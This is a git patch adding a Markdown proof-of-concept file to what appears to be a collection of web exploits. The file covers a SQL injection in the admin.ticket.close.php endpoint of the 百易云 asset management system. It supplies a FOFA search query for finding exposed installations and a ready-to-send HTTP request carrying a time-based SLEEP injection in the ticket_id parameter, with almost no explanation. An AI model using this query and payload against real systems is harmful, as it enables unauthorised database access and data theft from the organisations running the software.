From 67334e6ee9556954b04b38272d8663946f7f1a9f Mon Sep 17 00:00:00 2001 From: Nexolanta <73454853+Nexolanta@users.noreply.github.com> Date: Thu, 6 Mar 2025 17:37:53 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E7=99=BE=E6=98=93=E4=BA=91=E8=B5=84?= =?UTF-8?q?=E4=BA=A7=E7=AE=A1=E7=90=86=E7=B3=BB=E7=BB=9Fadmin.ticket.close?= =?UTF-8?q?.php=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.m?= =?UTF-8?q?d?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...资产管理系统admin.ticket.close.php存在SQL注入漏洞.md | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/wpoc/百易云资产管理系统/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md b/wpoc/百易云资产管理系统/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md index 8b13789..1bbcfd1 100644 --- a/wpoc/百易云资产管理系统/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md +++ b/wpoc/百易云资产管理系统/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md @@ -1 +1,22 @@ +# 百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞 +百易云资产管理系统在admin.ticket.close.php接口下存在sql注入漏洞 + +## fofa + +```javascript +body="不要着急,点此" +``` + +## poc + +```javascript +GET /wuser/admin.ticket.close.php?ticket_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(2)))OKTO) HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close + + +```